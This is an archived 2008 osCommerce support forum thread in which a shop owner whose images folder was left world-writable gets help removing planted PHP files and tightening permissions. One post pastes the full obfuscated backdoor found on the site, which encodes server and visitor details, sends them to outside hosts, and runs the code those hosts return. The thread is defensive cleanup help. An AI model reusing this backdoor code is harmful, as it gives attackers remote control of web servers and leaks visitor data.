saduneni Posted April 20, 2008 Posted April 20, 2008 Please take a look at this link, it came from nowhere http://www.girlzwholesale.com/catalog/imag...eb256204e2.html the directory /sierra doesnt even exist! i need help this is a new setup and i have limited help from my host, (www.websitesource.com) they suggested me to open a ticket in oscommerce. i though there are "master minds" over here so i am trying.. thanks in advance
germ Posted April 20, 2008 Posted April 20, 2008 You've been hacked because the permissions on your /catalog/images folder are at 777 Look at these files: /catalog/images/71512.php /catalog/images/banners/52488.php /catalog/images/default/142853.php /catalog/images/dvd/76321.php /catalog/images/gt_interactive/137999.php /catalog/images/hewlett_packard/141102.php /catalog/images/icons/16755.php /catalog/images/infobox/175095.php /catalog/images/mail/211443.php /catalog/images/matrox/130494.php /catalog/images/microsoft/205609.php I think you'll find them all bogus. This one looks very suspicious to me: /catalog/images/fsys2.php If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
saduneni Posted April 20, 2008 Author Posted April 20, 2008 I have checked the code and i did not find any thing important, its all looks fishy and code on all the pages (as mentioned by germ) are similar as one one in fsys2.php as below: is this code for anyone that belongs to oscommerce? and if yes why its in image folder? <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else if (include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>
germ Posted April 20, 2008 Posted April 20, 2008 Trust me, all those files are BAD. I know because the same thing happened to me last month. :blush: There may be BAD files in your admin now, too. I can't see those. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
germ Posted April 20, 2008 Posted April 20, 2008 The first thing you must do is change the permissions on the /catalog/images folder to 755 The same with all the folders inside the /catalog/images folder. Then delete the bad files. Then change the permissions on all the files in the /catalog/images folder to 644 Then check your /admin/backups folder for bad files. And probably /admin/images folder. You've been hacked for over a month. The timestamp on most of the bad files is: 10-Mar-2008 16:39 If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
saduneni Posted April 20, 2008 Author Posted April 20, 2008 Hi jim, i am keep on checking all the files in admin and other areas, so far i did not find any file. but what i did is i have removed fsys2.php(deleted) it look non of the catalog part is effected, i am going to back up and remove all the unwanted files, but my question is can i change permission to this folder, pls check the screen shot, i think its 666 {hope i am right} please need advice,
saduneni Posted April 20, 2008 Author Posted April 20, 2008 sorry overlooked, i am going to try and see thanks Hi jim, i am keep on checking all the files in admin and other areas, so far i did not find any file. but what i did is i have removed fsys2.php(deleted) it look non of the catalog part is effected, i am going to back up and remove all the unwanted files, but my question is can i change permission to this folder, pls check the screen shot, i think its 666 {hope i am right} please need advice,
germ Posted April 20, 2008 Posted April 20, 2008 The permissions need to be 755 Check all the boxes for USER Then for GROUP and OTHER, the READ and EXEC boxes ONLY! If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
saduneni Posted April 20, 2008 Author Posted April 20, 2008 :thumbsup: thanks, i have done every thing as per your instruction, my shop is in good shape. i have checked all the files in admin but i did not find any goofy files, am i misssing something? like hidden files. i cannot see! and what about database? there could be any potential risk involved? thanks again sorry overlooked, i am going to try and see thanks
germ Posted April 20, 2008 Posted April 20, 2008 There weren't any hidden files in mine. If you got all the bad files, changed the permissions like I said, and checked the admin, then you should be OK now. Just keep a close eye on it for a while. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
saduneni Posted April 20, 2008 Author Posted April 20, 2008 sure, thanks jim, thanks for your help There weren't any hidden files in mine. If you got all the bad files, changed the permissions like I said, and checked the admin, then you should be OK now. Just keep a close eye on it for a while.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.